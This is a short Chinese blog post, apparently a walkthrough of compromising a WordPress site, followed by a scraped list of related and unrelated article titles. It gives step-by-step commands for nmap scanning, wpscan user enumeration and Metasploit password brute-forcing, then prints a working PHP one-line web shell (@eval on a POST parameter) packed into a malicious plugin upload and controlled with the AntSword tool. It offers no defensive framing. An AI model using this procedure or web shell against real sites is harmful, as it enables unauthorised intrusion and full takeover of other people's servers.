渗透wordpress过程
条件:
本地机在10.xx
Kali也在10.xx 且能联网
蚁剑工具
Nmap进行扫描端口,发现只有80端口开放
使用wpscan工具,进行扫描
wpscan --url https://www.xxxxxxx.wiki/ --enumerate u
扫描指定用户
发现有几个用户
用msf对这几个用户进行密码爆破
得出登陆密码
登陆进入192.168.10.40
利用插件漏洞,进行渗透
下载插件
下载后解压,把一句话木马放入
Yjh.php
<?php
@eval($_POST[shell]);
?>
然后把该文件夹压缩为zip格式,上传插件
之后打开蚁剑
输入url地址为下
输入一句话密码,添加成功
即获取网站shell
渗透wordpress过程相关推荐
- 记一次用WPScan辅助渗透WordPress站点
记一次用WPScan辅助渗透WordPress站点 一.什么是WPScan? WPScan 是一个扫描 WordPress 漏洞的黑盒子扫描器,它可以为所有 Web 开发人员扫描 WordPress ...
- cs linux内网渗透,记一次利用cs进行内网渗透的过程
记一次利用cs进行内网渗透的过程 首先搭建好cs的服务端和客户端连接,下面正式进行渗透 环境 kali:192.168.0.226 域控机:192.168.0.138 成员机:192.168.0.2 ...
- 关于网络渗透的过程以及感想记录
12.28 这个网站是我很早之前就想攻下的,经历大概如下: 1.想借着ctf的劲头去看看此网站,但是失败,原因是,ctf跟实战完全是两码子事儿啊!此网站的情况比较复杂,大部分是静态页面也就是html, ...
- Vulnhub靶机:DC-7渗透详细过程
DC-7 前言提要 这个靶机有用到社工~,还是蛮有趣的 靶场地址:https://www.vulnhub.com/entry/dc-7,356/ DC-7是一个中级的靶场,需要具备以下前置知识: 基础 ...
- Vulnhub靶机:DC-8渗透详细过程
DC-8 前情提要 靶场地址:https://www.vulnhub.com/entry/dc-8,367/ DC-8是一个中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测 ...
- Vulnhub靶机:DC-3渗透详细过程
前情提要 靶场地址:https://www.vulnhub.com/entry/dc-32,312/ DC-3是一个适合初学者的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试 ...
- 记录一次vuln靶场的渗透过程---driftingblues9
记录一次渗透的过程 目录 一.信息收集 二.发现漏洞 三.权限提升 总结 一.信息收集 1.使用nmap扫描网段,发现存活主机,以及开放的端口 nmap -v 192.168.216.0/24 192 ...
- 红队渗透靶场之W1R3S靶场(超详细!)
W1R3S考察知识 nmap的基本使用 目录爆破工具的使用 CMS漏洞的利用 Linux用户的简单提权 W1R3S靶场搭建 W1R3S靶场下载地址: https://download.vulnhub. ...
- metasploit 利用MS08-067渗透攻击xp系统全过程
工具:metasploit,目标系统 windows xp sp3 English 渗透攻击过程 1.search MS08-067 2. use exploit/windows/smb/ms0 ...
最新文章
- Python,OpenCV轮廓属性、轮廓检测及绘制
- RTL Schematic 与 Technology Schematic的区别?
- codeforces1454 F. Array Partition
- 代码走查和代码审查_如何避免代码审查陷阱降低生产率
- MongoDB数据建模介绍
- 如何检测支付宝接口中notify_url.php有没有返回,微信小程序支付成功,但是notify_url接收不到回调如何排查此问题?...
- .Net core 应用程序发布Web时,有些文件夹没有发布成功解决办法
- Ubuntu安装搜狗输入法只需四步
- ofbiz碰到问题收集
- qtp11安装及入门
- 淘宝客APP源码/社交电商自营商城源码/前端基于Uniapp开发
- 最全的Android源码目录结构详解【转】
- 机器学习知识点整理(《机器学习》——周志华)
- 架构师主要做些什么,你知道吗?
- w10桌面计算机图标箭头去除,如何让win10桌面图标箭头取消除 笔记本电脑去掉快捷小箭头软件-♚付涛纪实阁♚...
- 有信仰与无信仰家族200年对比,让世人震惊!!
- 1.CDC绘图。包括加载图片,消去图片,设置图片一部分透明,不闪烁方式。
- 移动端布局三种视口_移动H5的meta视口标签、弹性布局原则和背景图片适配
- arm裸机与嵌入式linux驱动开发,如何编写基于ARM的裸机程序和基于Linux的驱动程序?...
- 利用CANoe Vector LDF Explorer Pro创建LDF文件
热门文章
- 堡垒机是服务器吗?两者有区别吗?
- matlab 模拟风,matlab谐波合成法的脉动风模拟
- 亚马逊s3存储: aws cli上传工具速度和各文件大小关系探究
- Redhat Linux 2.6.18-308.el5修改系统时间
- 三态门三个状态vhdl_基本逻辑门和三态门实验报告.docx
- 时间转换(秒数转时分秒,时间戳转年月日)
- 直播带货app源码+搭建教程
- 电容充放电时间计算方法(指数衰减脉冲) 附C代码模拟实现
- [4G5G专题-1]:专题导读
- srsRAN on PlutoSDR(一)